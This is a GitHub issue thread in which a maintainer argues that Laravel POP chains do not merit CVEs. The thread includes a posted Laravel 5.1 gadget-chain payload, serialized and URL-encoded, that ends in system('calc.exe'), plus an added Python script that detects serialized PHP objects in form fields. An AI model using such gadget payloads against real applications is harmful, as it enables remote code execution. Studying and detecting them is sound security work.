Open beicheng-maker opened 1 year ago
Hello @beicheng-maker,
Would you please not request new CVEs for POP chains? 🌺 POP chains mislead the users and MITRE will revoke the CVEs. We discussed it here and here.
Same for https://github.com/beicheng-maker/vulns/issues/3 and https://github.com/beicheng-maker/vulns/issues/5
Thank you, Regards, Mirhossein
Hello!
Dear @beicheng-maker,
I mean: CVEs are NOT for POP chains. POP chains are NOT vulnerabilities and they should NOT have CVEs. MITRE will revoke all POP chain-related CVEs.
If you find an untrusted input in the unserialize function in any software, it's a vulnerability and you can request a CVE for it.
But if you find a POP chain and used your own unserialize function, it is NOT a vulnerability and please don't request MITRE to issue a CVE for it.
If you have any questions, I can answer them.
CC: @Y4tacker, @guoyanan1g.
Thank you 🌸, Regards, Mirhossein
OK, thank you very much for your answer, and have a nice life.
Laravel 5.1 POP Chain
composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"
app/Http/Controllers/UsersController.php adding a controller UsersController
routes/web.php
Route::post('/test',[\App\Http\Controllers\UsersController::class,'store']);
EXP
O%3A42%3A%22SebastianBergmann%5CRecursionContext%5CContext%22%3A1%3A%7Bs%3A50%3A%22%00SebastianBergmann%5CRecursionContext%5CContext%00arrays%22%3BO%3A42%3A%22Illuminate%5CView%5CInvokableComponentVariable%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00callable%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A28%3A%22Illuminate%5CAuth%5CRequestGuard%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00provider%22%3Bs%3A8%3A%22calc.exe%22%3Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A14%3A%22call_user_func%22%3Bs%3A10%3A%22%00%2A%00request%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A4%3A%22user%22%3B%7D%7D%7D
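Added example (not part of the issue and not Laravel code): a defender-side check for the condition the thread calls the actual vulnerability, request input that carries PHP-serialized objects toward unserialize. It goes beyond the single /test route by scanning every form field; the function names, field names and sample body are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Header of a serialized PHP object: O:<byte length>:"<class>":<count>:{
# (C: is the older Serializable form with the same header shape.)
_HEADER = re.compile(rb'[OC]:(\d+):"')
_AFTER_NAME = re.compile(rb'":\d+:\{')


def serialized_classes(value: bytes) -> list[str]:
    """Return the class names of PHP objects serialized anywhere in value."""
    found = []
    for m in _HEADER.finditer(value):
        n = int(m.group(1))
        name = value[m.end():m.end() + n]
        # Require the declared length to fit and the rest of the header to
        # follow, so ordinary text containing 'O:1:"' is not reported.
        if len(name) == n and _AFTER_NAME.match(value, m.end() + n):
            found.append(name.decode("utf-8", "replace"))
    return found


def scan_form_body(body: str) -> dict[str, list[str]]:
    """Map each form field that carries serialized objects to their classes."""
    hits = {}
    # latin-1 keeps every percent-decoded byte (including %00) intact.
    for field, raw in parse_qsl(body, keep_blank_values=True, encoding="latin-1"):
        classes = serialized_classes(raw.encode("latin-1"))
        if classes:
            hits[field] = classes
    return hits


# Constructed sample body; App\Models\Report is a hypothetical class name.
SAMPLE_BODY = urlencode({
    "name": "alice",
    "data": 'O:8:"stdClass":1:{s:5:"inner";O:17:"App\\Models\\Report":0:{}}',
    "note": 'ratio O:1:"x"',
})

if __name__ == "__main__":
    for field, classes in scan_form_body(SAMPLE_BODY).items():
        print(f"field {field!r} carries serialized objects: {classes}")
```

A hit means a field is shaped like unserialize input; whether the application actually passes that field to unserialize still has to be confirmed in the code.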